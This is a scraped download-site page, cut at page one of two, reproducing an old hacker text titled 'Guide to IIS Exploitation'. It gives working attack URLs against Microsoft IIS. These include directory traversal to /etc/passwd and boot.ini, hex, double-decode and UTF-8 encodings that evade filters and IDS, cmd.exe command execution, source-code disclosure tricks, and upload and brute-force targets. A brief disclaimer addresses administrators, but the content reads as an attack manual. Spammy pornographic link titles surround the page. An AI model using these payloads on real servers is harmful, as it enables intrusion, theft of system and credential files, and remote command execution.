亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? guide to iis exploitation.txt

?? a collection of mega hacking tools
?? TXT
?? 第 1 頁 / 共 2 頁
字號:
****************************************************************************                      Guide to IIS Exploitation                          **                            by fugjostle                                 **                                                                         **                             V.1.0.1                                     **                                                                         **          Questions? Comments? Email: fugjostle at ch0wn.com             ****************************************************************************    Disclaimer: I do not condone hacking IIS servers in any way,                 shape or form. This guide is intended as a guide                 for admins to help them understand what most                 script kiddies don't understand but are happy to                 exploit. --[On the first day, God created directory traversal]Relative paths are the developers friend. They allow an entire website to be moved to another directory without the need for changing all the links in the html. For example, lets say we have a webpage called 'pictures.html' in the htdocs dir:  Absolute path:  /home/webpages/htdocs/pictures.html  Absolute path:  /home/webpages/images/pic1.gifIn the html you can refer to the 'pic1.gif' via an absolute path shown above or use a relative path:  Relative path: ../images/pic1.gifThe relative path tells the server that it has to go to the parent directory (dot dot) -->  from /home/webpages/htdocs to /home/webpages. Then the server goes into the images dir and looks for the gif file to display.Anyone who has used the 'cd' command in DOS and *nix should be familiar with the operation. So what's the problem I hear you ask... well, the programmers of web server didn't think to check the supplied URL to ensure that the requested file was actually in the web directory. This allows someone to backtrack through the servers directory structure and request files that the web server has access to. For example,  http://www.target.com/../../../etc/passwdNB. you can also use double dots and double quotes. This is useful to evadeIntrusion Detection Systems (IDS):  http://www.target.com//....//....//...././etc/./passwdThe webserver simply strips the extra stuff out and processes the request.This is the same as the previous example and can make string matching IDS'swork for their money.--[On the second day, God created Hexadecimal]Once programmers started to realise the mistake they began to create parser routines to check for naughty URL's and keep the requests within the document root. Then along comes a wiley hacker who wonders if by encoding the URL will it still be recognised by the parser routines.You may have noticed that when you enter a URL that includes a space it is replaced with the hex equivalent (%20):  http://www.target.com/stuff/my index.html  becomes  http://www.target.com/stuff/my%20index.htmland voila, it works. So what would happen if we changed the now denied URL:  http://www.target.com/../../../etc/passwd  to  http://www.target.com/%2e%2e/%2e%2e/%2e%2e/etc/passwd The parser routine checks for the existence of dots in the path and finds none... the webserver then proceeds with the request.An interesting feature is that you can encode the hex symbol  and the web server will decode it all for you. This is called the "double decode". For example, given the URL "http://victim.com/..%252f..%252fdocs/", the following will take place:(1) On the first decode, the string will be converted to:  "http://victim.com/..%2f..%2fdocs/"  [%25 = '%' so '%252f' is decoded to '%2f'](2) On the second decode, the string will be converted to:  "http://victim.com/../../docs/"  [%2f = '/']--[On the third day, God created Unicode]The World Wide Web is a global phenomenon and as such needs to be globally interoperable. This raised the question of how to deal with all the different character sets around the world. As a response to this, Unicode was created:   -----------------------------------------------------------------   Unicode provides a unique number for every character, no matter    what the platform, no matter what the program, no matter what    the language. The Unicode Standard has been adopted by such    industry leaders as Apple, HP, IBM, JustSystem, Microsoft,    Oracle,SAP, Sun, Sybase, Unisys and many others. Unicode is    required by modern standards such as XML, Java, ECMAScript    (JavaScript), LDAP, CORBA 3.0, WML, etc., and is the official    way to implement ISO/IEC 10646. It is supported in many operating    systems, all modern browsers, and many other products.   -----from http://www.unicode.org---------------------------------The problem with Unicode is that it requires 16 bits for a single character and software tended to use 8 bits for a single character. Unicode TransForm using 8 bits (UTF-8) was created. This allows for multibyte encoding where a variable number of bytes can be used for each character:  Character  1-byte  2-byte  3-byte    .         2E      C0 AE   E0 80 AE    /         2F      C0 AF   E0 80 AF    \         5C      C1 9C   E0 81 9C This lead to a new vulnerability in certain webservers. The parser didn't understand this new encoding and allowed it through :-)For example:  www.target.com/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwdRecent vulnerabilities have been taking advantage of the fact that the web server doesn't understand the Unicode UTF-8 character set but the underlying OS does:  www.target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c%20dirUnderstanding the distinction between Unicode and UTF-8 can be difficult. Asa general rule of thumb you can use the following format as a guide:  %uxxxx          = Unicode  %xx%xx          = UTF-8  %xx             = Hexidecimal  %xxxx           = Double Decode--[On the fourth day, God created default installs]IIS comes installed with various DLL's (Dynamic Link Libraries) that increase the functionality of the web server. These ISAPI (Internet Server API) applications allow programmers/developers to deliver more functionality to IIS.The DLL's are loaded into memory at startup and offer significant speed over traditional CGI programs. For example, they can be combined with the Internet Database Connector (httpodbc.dll) to create interactive sites that use ODBC to access databases.The problem is that some of these DLL's are insecure and are often installed with sample scripts that demonstrate how to exploit, erm, I mean use them.ASP.DLL is used to pre-process requests that end in ".asp". ASP (Active Server Pages) are basically HTML pages with embedded code that is processed by the webserver before serving it to the client. Here's some examples to illustrate how the sample pages installed by defaultcan aid someone breaking into your site via the ASP.DLL:[prefix all the examples with http://www.target.com]  /default.asp.   ** Appending a '.' to the URL can reveal the source    ** on older systems. Remember hex encoding? You can    ** also try using %2e to do the same thing.  /msadc/samples/adctest.asp   ** This gives you an interface into the msadcs.dll    ** and allows creation of DSN's. Read RFP's stuff   ** for idea's on how to exploit this.  /iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../.../../../../boot.ini  /msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../.../boot.ini   ** You can view the source of anything in the    ** document root. '/msadc/' needs to be in the    ** request as it is checked for, wait for this,   ** security :-)  /index.asp::$DATA   ** Appending '::$DATA' to the URL can reveal   ** the source of the ASP.  /index.asp%81     ** Append a hex value between 0x81 and 0xfe   ** and you can reveal the source of any server   ** processed file. This only works on servers   ** that are Chinese, Japanese or Korean.  /AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:\")|   ** This one allows you to execute remote   ** shell commands ;-)ISM.DLL is used to process requests that end in ".htr". These pages were used to administer IIS3 servers. In IIS4 they are not used but various .htr samples are installed by default anyway and offer another avenue for entry.  /index.asp%20%20%20..(220 more)..%20%20.htr   ** IIS will redirect this request to ISM.DLL,   ** which will strip the '.htr' extension and   ** deliver the source code of the file.    /global.asa+.htr   ** Does the same thing as the %20%20 exploit   ** above. ISM.DLL strips the +.htr and delivers   ** you the source of the file  /scripts/iisadmin/ism.dll?http/dir   ** Excellent brute force opportunity if the   ** dll exists. Successful logons will reveal   ** lots of useful stuff.  /iisadmpwd/aexp.htr   ** The iisadmpwd diectory contains several .htr    ** files that allow NetBIOS resolution and    ** password attacks.  /scripts/iisadmin/bdir.htr??c:\inetpub\www   ** This method will only reveal directories   ** but can be useful for identifying the    ** servers structure for more advanced    ** attacks later.MSADCS.DLL is used to allow access to ODBC components via IIS using RDS (Remote Data Service). RDS is part of the default install of Microsoft Data Access Components (MDAC) and is a commonly exploited on IIS. It can allowarbitrary shell commands to be executed with system privileges.  /msadc/msadcs.dll   ** If this file exists then there's a pretty    ** good chance that you can run the RDS    ** exploit again the box. More on this later.HTTPODBC.DLL is the Internet Connector Database (IDC) and used when the webserver wants to connect to a database. It allows the creation of web pagesfrom data in the database, and it allows you to update/delete items from within webpages. Pages with the extension '.idc' are sent to the HTTPODBC.DLLfor processing.   /index.idc::$DATA   ** Appending '::$DATA' to the URL can reveal   ** the source of the IDC.  /anything.idc     ** Requesting a non-existance file will   ** reveal the location of the web root.  /scripts/iisadmin/tools/ctss.idc   ** Creates a table based on the parameters it    ** receives. Excellent place to look at for    ** SQL injection.SSINC.DLL is used for processing Server Side Includes (SSI). '.stm', '.shtm' and '.shtml' extension are sent to the DLL which interpretsthe SSI statements within the HTML before sending it to the client.An example of SSI would be:  <!--#include file="news.txt"-->This SSI tells the server to include the 'news.txt' in the final HTML sent to the use. SSI statements are beyond the scope of this document but offer another security hole open to our wiley hax0r. Ensure you remove the app mapping and disable SSI if you do not require its functionality.SSINC.DLL is also vulnerable to a remote buffer overflow, read the following advisory for details:  http://www.nsfocus.com/english/homepage/sa01-06.htmSome examples of SSINC.DLL fun:  /anything.stm   ** If you request a file that doesn't exist   ** then the server error message contains the   ** the location of the web root.  /somedir/anything.stm/somedir/index.asp   ** Using this method allows you to view the   ** the source code for index.asp.   IDQ.DLL is a component of MS Index Server and handles '.ida' and '.idq'requests. This DLL has had some big exposure with the recent Nimda worm. I'm not going into too much detail but '.ida' was used in a buffer overflow that resulted in user defined code being executed on the server.  /anything.ida or /anything.idq     ** Requesting a non-existance file will   ** reveal the location of the web root.  /query.idq?CiTemplate=../../../boot.ini   ** You can use this to read any file on   ** the same drive as the web rootCPSHOST.DLL is the Microsoft Posting Acceptor. This allows uploads to your IIS server, via a web browser or the Web Publishing Wizard. The existance of this DLL can allow attackers upload files to the server. Other files such asuploadn.asp, uploadx.asp, upload.asp and repost.asp are installed with SiteServer and allow upload of documents to the server:  /scripts/cpshost.dll?PUBLISH?/scripts/dodgy.asp   ** If this file is there then you may be able   ** to upload files to the server.  /scripts/uploadn.asp     ** Connecting to this page gives you a nice   ** gui for uploading your own webpages. You   ** probably need to brute the userid.There are lots more example scripts in the default install and quite a few of them are very, very insecure. Microsoft recommends that you remove ALL samples from any production server including the ExAir, WSH, ADO and other installed samples.  IIS Default Web Site  --------------------  IISSAMPLES  - c:\inetpub\iissamples  IISADMIN    - c:\winnt\system32\inetsrv\issadmin  IISHELP     - c:\winnt\help  SCRIPTS     - c:\inetpub\scripts  IISADMPWD   - c:\winnt\systems32\inetsrv\iisadmpwd  msadc       - c:\program files\common files\system\msadc  logfiles    - c:\winnt\system32\logfiles  default.htm - c:\inetpub\wwwroot  IIS Default App Mapping  -----------------------  .asa   - c:\winnt\system32\inetsrv\asp.dll  .asp   - c:\winnt\system32\inetsrv\asp.dll  .cdx   - c:\winnt\system32\inetsrv\asp.dll  .cer   - c:\winnt\system32\inetsrv\asp.dll  .htr   - c:\winnt\system32\inetsrv\ism.dll  .idc   - c:\winnt\system32\inetsrv\httpodbc.dll  .shtm  - c:\winnt\system32\inetsrv\ssinc.dll  .shtml - c:\winnt\system32\inetsrv\ssinc.dll

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
视频一区中文字幕国产| 精品久久久久久无| 欧美一区二区三级| 国产精品久久影院| 日本一道高清亚洲日美韩| 成熟亚洲日本毛茸茸凸凹| 欧美性受xxxx| 中文乱码免费一区二区| 加勒比av一区二区| 在线观看91精品国产麻豆| 中文字幕亚洲欧美在线不卡| 九九热在线视频观看这里只有精品| 97久久精品人人澡人人爽| 精品国产污网站| 五月综合激情网| 色婷婷av一区| 最近中文字幕一区二区三区| 国产精品一二三四| 国产精品三级av| 精品福利一区二区三区免费视频| 国产一区二区毛片| 免费一级片91| 国产毛片一区二区| 欧美电视剧免费全集观看| 午夜视频在线观看一区二区三区| 色屁屁一区二区| 亚洲激情自拍偷拍| 91蜜桃婷婷狠狠久久综合9色| 久久久久9999亚洲精品| 国产呦精品一区二区三区网站| 欧美丰满少妇xxxbbb| 亚洲一区电影777| 欧美在线免费播放| 一区二区三区在线观看国产| 99久久精品国产精品久久| 国产精品免费久久久久| 激情另类小说区图片区视频区| 欧美一区二区三区免费大片| 亚洲自拍偷拍综合| 国产一区二区调教| 美脚の诱脚舐め脚责91| 日韩欧美在线网站| 国产成人免费视频网站| 97se亚洲国产综合自在线观| 国产精品久久久久久久第一福利| 国产成人精品在线看| 日本一区二区成人| 一本一道久久a久久精品| 亚洲影视在线播放| 欧美一区二区私人影院日本| 国内精品国产成人国产三级粉色 | 欧美偷拍一区二区| 亚洲福利电影网| 欧美一级片在线观看| 国产一区二区成人久久免费影院 | 国产成人亚洲综合a∨婷婷图片| 色婷婷综合久久| 天堂午夜影视日韩欧美一区二区| 欧美日韩中文字幕一区| 日韩成人av影视| 久久美女艺术照精彩视频福利播放| 国产精品1区2区3区在线观看| 国产精品福利一区二区三区| 久久影院视频免费| 成人av电影观看| 午夜成人在线视频| 久久免费午夜影院| 91毛片在线观看| 麻豆精品精品国产自在97香蕉| 日本一区二区动态图| 欧美日韩亚洲丝袜制服| 国产一区二区在线观看视频| 亚洲精品视频一区二区| 91网上在线视频| 尤物在线观看一区| 成人免费视频网站在线观看| 亚洲成av人片在线| 国产精品五月天| 91精品国产91综合久久蜜臀| 国产福利一区二区三区视频| 亚洲午夜电影在线| 欧美极品xxx| 欧美嫩在线观看| 成人av综合一区| 麻豆91在线看| 一区二区日韩av| 国产日韩欧美高清在线| 欧美一区二区三区日韩| 色悠久久久久综合欧美99| 国产麻豆成人精品| 日韩av电影免费观看高清完整版 | 本田岬高潮一区二区三区| 日韩精品成人一区二区在线| 亚洲色图在线播放| 久久久精品国产免费观看同学| 精品视频999| 粗大黑人巨茎大战欧美成人| 久久精品国产免费| 日日摸夜夜添夜夜添国产精品| 国产精品乱码久久久久久 | 精品视频色一区| 91亚洲国产成人精品一区二区三| 精品一区二区免费视频| 奇米777欧美一区二区| 亚洲一区中文在线| 玉足女爽爽91| 最新国产成人在线观看| 国产精品美女www爽爽爽| 国产日韩视频一区二区三区| 欧美成人女星排名| 日韩欧美中文字幕精品| 制服丝袜成人动漫| 91麻豆精品国产91久久久久久| 色屁屁一区二区| 91国产丝袜在线播放| 色8久久精品久久久久久蜜 | 中文字幕在线播放不卡一区| 精品国产亚洲在线| 精品电影一区二区三区| 亚洲精品一区二区三区福利| 久久综合色8888| 国产无一区二区| 日本一区二区三区免费乱视频| 国产女主播一区| 一区在线观看视频| 亚洲视频一二三区| 亚洲妇熟xx妇色黄| 三级在线观看一区二区| 日韩国产精品久久| 激情久久久久久久久久久久久久久久| 精品一区免费av| 国产精品自在在线| 欧美第一区第二区| 久久综合九色欧美综合狠狠 | 亚洲激情图片qvod| 天天操天天色综合| 国产精品中文字幕日韩精品| 国产精品综合在线视频| 波多野结衣的一区二区三区| 91精品1区2区| 91精品国产乱码| 久久久不卡网国产精品一区| 国产精品久久久久国产精品日日| 亚洲精选免费视频| 男女性色大片免费观看一区二区| 久久精品国产秦先生| 99久久免费国产| 欧美日韩小视频| 久久婷婷国产综合国色天香| 国产精品视频在线看| 亚洲综合激情小说| 精品一区二区三区蜜桃| 91色婷婷久久久久合中文| 欧美日韩亚洲综合一区二区三区 | 男男成人高潮片免费网站| 国产在线精品视频| 一本色道久久综合精品竹菊| 欧美一级日韩一级| 亚洲女与黑人做爰| 日韩欧美一级在线播放| 亚洲福中文字幕伊人影院| 一本色道久久综合狠狠躁的推荐 | 波波电影院一区二区三区| 在线视频中文字幕一区二区| 日韩精品一区二区三区老鸭窝| 中文字幕乱码亚洲精品一区| 日本伊人色综合网| 91久久久免费一区二区| 国产欧美综合在线观看第十页| 午夜精品久久久久久久蜜桃app| 国产乱码精品一区二区三区忘忧草| 在线观看日韩毛片| 中文字幕一区二区三区蜜月| 久久99在线观看| 欧美亚洲综合另类| 亚洲欧洲日本在线| 高清视频一区二区| 精品国产乱码久久久久久老虎| 亚洲图片自拍偷拍| 99久久精品国产精品久久| 精品国产伦理网| 石原莉奈在线亚洲三区| 欧美专区在线观看一区| 国产区在线观看成人精品| 美国十次综合导航| 欧美日本国产一区| 亚洲一区二区三区激情| 色综合久久久久综合体桃花网| 亚洲国产成人午夜在线一区| 蜜臀va亚洲va欧美va天堂| 欧美另类久久久品| 亚洲高清久久久| 欧美亚洲精品一区| 亚洲美女屁股眼交| 99国产欧美另类久久久精品 | 美女视频黄久久| 日韩一区国产二区欧美三区| 午夜av区久久| 91精品国产综合久久香蕉麻豆| 亚洲bt欧美bt精品777|